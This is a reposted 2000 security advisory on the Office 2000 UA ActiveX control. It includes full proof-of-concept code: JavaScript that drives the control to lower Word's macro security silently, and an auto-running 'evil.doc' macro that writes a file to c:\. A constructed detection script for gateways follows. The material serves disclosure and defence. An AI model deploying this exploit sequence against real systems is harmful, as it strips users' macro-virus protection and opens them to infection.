Telecom and Logistics Associates
Security NEWs Service: TLAnews
publication: Christian ALT
"Because its abilities are marked 'safe for scripting,' anything is possible," said the security researcher that found the hole, a hacker known as "Dildog" who works for the security firm @Stake Inc.
When it debuted, the Office Assistant was dismissed by critics as the equivalent of training wheels for computer newbies. Yet the friendliness of the Office Assistant hides a great deal of power. In fact, it's essentially a back door for Microsoft to allow macros that can take control of a PC and help out users.
That control, however, can be manipulated to hurt users as well. A test program created by @Stake can set the system security to "low" and copy a text document to the hard drive.
@Stake Inc.
L0pht Research Labs
www.atstake.com www.L0pht.com
Security Advisory
Advisory Name: Microsoft Office 2000 UA Control Scripting
Release Date: 5-12-2000
Application: Microsoft Office 2000
Platform: Windows 95/98, NT 4.0 and 2000
Severity: Malicious active content can execute regardless of
macro virus protection settings.
Author: DilDog [dildog@atstake.com]
Vendor Status: Vendor contacted, official patch available
Web: http://www.L0pht.com/advisories.html
Overview:
Microsoft Office 2000 ships with an ActiveX control named "Microsoft Office
UA Control". It is installed by default and is categorized as being "safe for scripting".
The control is undocumented, and its interfaces are presumably used to script "Show Me"
demonstrations for Office 2000 help and 'office assistant' functionality. Analysis of the
control's interface reveals functionality to script almost any action in Office 2000
that the user could perform from the keyboard, including, but not limited to, lowering
the macro security settings to low. This action can be scripted from any HTML page viewed
with active scripting enabled, including both Internet Explorer and Outlook e-mail in
their default configurations.
Detailed Description:
The Microsoft Office UA control exports a powerful interface for automating
commands within the Office 2000 environment. The problem lies in the fact that the
control should -not- be marked safe for scripting. The capabilities of this control
are such that scripting it via remote HTML and email sources makes it extremely dangerous.
A demonstration of the vulnerabilities associated with this control is provided below.
The vulnerability demonstration performs the following actions:
1. Start instance of Microsoft Word by pointing a table frame to a
word document URL with no macros or active content.
2. Programmatically create UA control
3. Attach UA control to first instance of Microsoft Word
4. Make Word the active application
5. Show the Tools/Macro/Security dialog
6. Click on the 'LOW' security radio button
7. Click on the 'OK' button to confirm the change
8. Proceed to re-point a table frame to a word document URL with a macro, which
runs without prompting.
The fact that this control exists and is installed in this particular fashion would
permit the construction of a worm of unparalleled devastation, as it would be able to
turn off macro virus protection and 'script' its way to all of the people in your
address book.
Temporary Solution:
Disable Active Scripting in all Office 2000 applications, and in Internet Explorer.
It is no longer sufficient to turn on macro virus protection, as this vulnerability
allows those settings to be circumvented.
Vendor Response And Official Patch:
From secure@microsoft.com
"Wanted to let you know that the patch is now live at
http://officeupdate.microsoft.com/info/ocx.htm, and the security bulletin is live at
http://www.microsoft.com/technet/security/bulletin/ms00-034.asp."
Proof-of-Concept Code:
A demonstration of this vulnerability is available at:
http://www3.l0pht.com/~dildog/ouahack/index.html
This demonstration will set your Word 2000 macro security settings to 'LOW'. An
option will be presented to set it back to 'HIGH' or 'MEDIUM'.
The demonstration code is intentionally written to be harmless, but a worst case
scenario could easily involve more malicious code to perform such actions as file
modification, propagating worms and virii, or providing external access to internal
network resources.
dildog@atstake.com
[ For more advisories check out http://www.l0pht.com/advisories.html ]
L-ZERO-P-H-T
OUA Vulnerability Proof of Concept
This demonstration will modify the security settings of your Microsoft Word 2000 software, and prompt you if you want to return them back to their original settings. It will also place a small file in "c:\".
This demonstration requires that Office 2000 is installed, and that you are running Internet Explorer 4.0 or higher. It also requires that you have Active Scripting enabled.
Without your knowledge, you receive an Office 2000 Word file called evil.doc and a second one called blank.doc. These files are not displayed, but Word will start shortly.
evil.doc
' ThisDocument module: Word calls Document_Open when the document is opened
Option Explicit
Public Sub Document_Open()
    demonstration
End Sub

' Standard module
Option Explicit
' Declared in the demonstration but never called
Public Declare Function WinExec Lib "kernel32.dll" (ByRef lpFileName As Any, ByVal nCmdRef As Integer) As Integer
Sub demonstration()
    ' Write a marker file to show that the macro ran
    Open "c:\DILDOG_WAS_HERE.TXT" For Output As #1
    Print #1, "Your copy of Office 2000 is vulnerable to the"
    Print #1, "Office 2000 UA control remote scripting vulnerability."
    Print #1, "See http://www.l0pht.com for more information."
    Close #1
End Sub
Microsoft Office 2000
A file named "c:\dildog_was_here.txt" should be created.
On c:\ you find the file dildog_was_here.txt
Your copy of Office 2000 is vulnerable to the
The code
oua.html
/*
 Office UA Control Example

 Known ShowDialog TCIDs for POWERPOINT
 (some are global to other office apps):

 0: New Slide
 2: Check spelling
 3: Save As
 4: Print
 8: Insert Table
 17: Insert Chart
 18: New Presentation
 22: Paste
 23: Open
 26: Unknown. Makes hard drive whirr a lot. Sounds like a search operation.
 141: Find
 169: Show rulers
 184: Record macro
 186: Play macro
 298: Restore MDI Child
 313: Split MDI Child
 409: Draw with pen
 411: Draw with line
 522: Options dialog
 546: Insert Object
 548: View Controls Toolbar
 680: New Slide
 681: Insert Table
 682: Insert Clipart
 684: Write-Up
 689: View autoshapes toolbar
 700: Something I forgot
 701: Assign Design Template
 702: Whirr a lot
 703: Insert Powerpoint Object?
 704: Insert Powerpoint Object?
 731: Slide Transition
 733: Autocontent Wizard
 734: Full Slide Show
 735: Funky Grid Thing
 736: Maximize Workspace
 737: Maximize TOC
 738: Maximize Thumbnails
 739: Maximize Page view
 740: Full screen show
 741: show master text styles
 748: Save As
 750: Properties
 755: Paste Special
 762: Header/Footer
 768: Add Date/Time
 769: Add Page Number
 790: Choose Language
 793: Autocorrect
 797: Customize
 831: Open recent document
 837: LAUNCH OUTLOOK
 838: Launch outlook in a different way
 841: Move cursor?
 842: Move cursor?
 843: Maximize MDI Client
 916: Show table/border toolbar
 925: Zoom
 927: About
 938: Mail document?
 943: Add-Ins
 959: Activate
 983: Help
 1004: Activate Retarded Paperclip (tm)
 1015: Open Location
 1016: Launch Internet Explorer?!
 1021: Browse Favorites
 1023: Hide Toolbars?
 1031: WordArt
 1056: Shadow Settings
 1057: 3D Settings
 1110: Insert Autoshape?
 1111: Insert rectangle
 1112: Insert Parallelogram
 1113: Insert Rhombus
 1114: Insert Diamond
 ...
 1119: Insert Circle
 ...
 1144: Insert Up Arrow
 1145: Insert Down Arrow
 ...
 1561: LAUNCH VISUAL BASIC

 For word, 1695 is launch visual basic

 * Hrm. That's enough of that.... *
*/

var ua;

function setup() {
    // Create UA control
    ua = new ActiveXObject("OUACtrl.OUACtrl.1");
    // Attach UA object to the running Word window (window class "OpusApp")
    ua.WndClass="OpusApp";
    ua.OfficeApp=0;
    // Verify UA object sees the Office application
    return ua.IsAppRunning();
}

function disablemacroprotection() {
    var ret;
    // Activate application
    ua.AppActivate();
    // Display macro security dialog
    ua.ShowDialog(0x0E2B);
    // Click the 'low' button
    ua.SelectTabSDM(0x13);
    // Click the 'ok' button
    ua.SelectTabSDM(1);
}

function enablemacroprotection() {
    // Activate application
    ua.AppActivate();
    // Display macro security dialog
    ua.ShowDialog(0x0E2B);
    // Click the 'medium' button
    ua.SelectTabSDM(0x12);
    // Click the 'ok' button
    ua.SelectTabSDM(1);
}

// Beginning of script execution
if(setup())
{
    disablemacroprotection();
    parent.frames["blank"].location="evil.doc";
}
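
An added example, not part of the advisory or of @Stake's demonstration: a static check that a mail or web gateway could run over HTML to flag script that creates the UA control and drives the macro security dialog. The function names, verdict labels and sample inputs are constructed, and treating the ProgID's version suffix as optional is an assumption.

```javascript
// Added example: gateway-side check for HTML that scripts the Office UA control.
// From the page: ProgID "OUACtrl.OUACtrl.1", the method names, dialog id 0x0E2B.
// Assumptions: optional version suffix, scanHtml(), verdict labels, sample inputs.
const CREATE = /(?:new\s+ActiveXObject|CreateObject)\s*\(\s*["']\s*(OUACtrl\.OUACtrl(?:\.\d+)?)\s*["']/i;
const CALL = /\.\s*(ShowDialog|SelectTabSDM|AppActivate|IsAppRunning)\s*\(\s*([^)]*)\)/gi;
const MACRO_SECURITY_DIALOG = 0x0E2B; // "Display macro security dialog" in oua.html

// Return the text of every <script> element in the document.
function scriptBodies(html) {
  return [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi)].map(m => m[1]);
}

// Drop block and line comments so commented-out code is not reported.
function stripComments(code) {
  return code.replace(/\/\*[\s\S]*?\*\//g, " ").replace(/(^|[^:])\/\/.*$/gm, "$1");
}

// Parse a numeric literal argument; hex and decimal compare equal afterwards.
function numericArg(text) {
  const t = text.trim();
  return /^(0x[0-9a-f]+|\d+)$/i.test(t) ? Number(t) : null;
}

function scanHtml(html) {
  const result = { progId: null, calls: [], opensMacroSecurity: false };
  for (const body of scriptBodies(html)) {
    const code = stripComments(body);
    const created = CREATE.exec(code);
    if (created) result.progId = created[1];
    for (const [, method, rawArg] of code.matchAll(CALL)) {
      const arg = numericArg(rawArg);
      result.calls.push({ method, arg });
      if (method.toLowerCase() === "showdialog" && arg === MACRO_SECURITY_DIALOG) result.opensMacroSecurity = true;
    }
  }
  // Creating the control at all is worth review; driving the macro security
  // dialog matches the sequence in the advisory and is blocked outright.
  result.verdict = !result.progId ? "clean" : result.opensMacroSecurity ? "block" : "review";
  return result;
}

// Constructed samples (not captured traffic).
const SAMPLES = {
  poc: '<script>var ua = new ActiveXObject("ouactrl.OUACtrl.1");\nua.AppActivate();\nua.ShowDialog(3627);\nua.SelectTabSDM(0x13);</script>',
  vbs: '<SCRIPT language="VBScript">Set ua = CreateObject("OUACtrl.OUACtrl.1")</SCRIPT>',
  commented: '<script>/* new ActiveXObject("OUACtrl.OUACtrl.1") */ var x = 1;</script>',
};
for (const [name, html] of Object.entries(SAMPLES)) console.log(name, scanHtml(html).verdict);
```

A check like this only sees script present in the HTML as delivered; it complements, and does not replace, the vendor patch and the Active Scripting setting described in the advisory.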